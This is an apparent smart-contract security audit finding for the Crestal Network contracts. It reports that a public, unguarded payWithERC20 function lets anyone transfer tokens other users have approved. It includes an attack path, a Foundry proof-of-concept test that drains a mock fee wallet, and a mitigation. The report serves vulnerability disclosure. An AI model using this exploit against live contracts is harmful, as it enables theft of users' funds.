Curved Yellow Hamster

High

# A malicious user can steal payment tokens from other users including the `feeCollectionWalletAddress`

### Summary

The public visibility assigned to the `Payment::payWithERC20` function without any access control enables any user to attempt sending payment tokens from an arbitrary address to another arbitrary address. Thus, a malicious user can call the `Payment::payWithERC20` function specifying `feeCollectionWalletAddress` or any user's address as the `fromAddress` and any address of their choice as the `toAddress` thereby, stealing funds.

### Root Cause

The `Payment::payWithERC20` function has a `public` visibility (see [here](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25-L32))without any access control and therefore can be called by just anyone.

### Internal Pre-conditions

1. A user, say `userA` has to approve the `Blueprint` contract to spend the payment tokens in question
2. The malicious user has to be aware that `userA` has approved for the `Blueprint` contract to spend payment tokens belonging to them
3. malicious user then calls the `Payment::payWithERC20` function specifying the address of `userA` as `fromAddress` while specifying any other address as the `toAddress`.

### External Pre-conditions

NA

### Attack Path

1. `userA` calls the `BlueprintCore::userTopUp` and approves for the `Blueprint` contract to spend payment tokens on their behalf.
2. A malicious user sees this transaction in the memepool and sees that `userA` has given approval to the `Blueprint` contract
3. The malicious user calls the `Payment::payWithERC20` function specifying the address of `userA` as `fromAddress` while specifying their own address as the `toAddress` and specify an amount less or equal to the amount approved by `userA`.

### Impact

The user who approves for the `Blueprint` contract to spend their tokens will have their tokens stolen by the malicious user. Note that if it happens that the `feeCollectionWalletAddress` gives the `Blueprint` contract such approvals, the malicious user will steal the funds from the `feeCollectionWalletAddress`. Thus innocent users will loss their funds.


### PoC

Add the following piece of code into `BlueprintV5.t.sol`

```javascript
function test_SpomariaPoC_payWithERC20_CanLeadToLossOfFunds() public {

        address malUser = makeAddr("MAL_USER");

        uint256 topUpAmount = 100 * 10 ** 18;

        // Add the payment address
        blueprint.addPaymentAddress(address(mockToken));

        // Mint tokens to the test account
        mockToken.mint(address(this), topUpAmount);

        // Approve the blueprint contract to spend tokens
        mockToken.approve(address(blueprint), topUpAmount);

        // Expect the UserTopUp event
        vm.expectEmit(true, true, true, true);
        emit BlueprintCore.UserTopUp(
            address(this), blueprint.feeCollectionWalletAddress(), address(mockToken), topUpAmount
        );

        // Call the userTopUp function
        blueprint.userTopUp(address(mockToken), topUpAmount);

        // Verify the top-up amount
        uint256 userBalance = blueprint.userTopUpMp(address(this), address(mockToken));
        assertEq(userBalance, topUpAmount, "User top-up amount is incorrect");

        // Verify the token transfer
        uint256 blueprintBalance = mockToken.balanceOf(address(blueprint.feeCollectionWalletAddress()));
        assertEq(blueprintBalance, topUpAmount, "Blueprint fee collection wallet balance is incorrect");

        // verify user balance after top up
        uint256 balance = mockToken.balanceOf(address(this));
        assertEq(balance, 0, "sender does not have the correct token balance after top up");

        uint256 balBefore = mockToken.balanceOf(malUser);
        assertEq(balBefore, 0);

        vm.startPrank(blueprint.feeCollectionWalletAddress());
        mockToken.approve(address(blueprint), type(uint256).max);
        vm.stopPrank();

        vm.startPrank(malUser);
        uint256 amountToSteal = mockToken.balanceOf(blueprint.feeCollectionWalletAddress());

        blueprint.payWithERC20(address(mockToken), amountToSteal, blueprint.feeCollectionWalletAddress(), malUser);
        vm.stopPrank();

        assertGt(mockToken.balanceOf(malUser), balBefore);
        assertEq(mockToken.balanceOf(blueprint.feeCollectionWalletAddress()), 0);
    }
```

Then run `forge test --match-test test_SpomariaPoC_payWithERC20_CanLeadToLossOfFunds`


### Mitigation

1. Change the vissibility of the `Payment:payWithERC20` from `external` to `internal`. This way, the `Blueprint` and `BlueprintCore` contracts can still call it since they both inherit the `Payment` contract while preventing any user from making an external call to the `Payment:payWithERC20`.

2. Alternatively, if option one is not suitable, consider adding an access control to the `Payment:payWithERC20` to allow only the specified contracts call the function and no more.
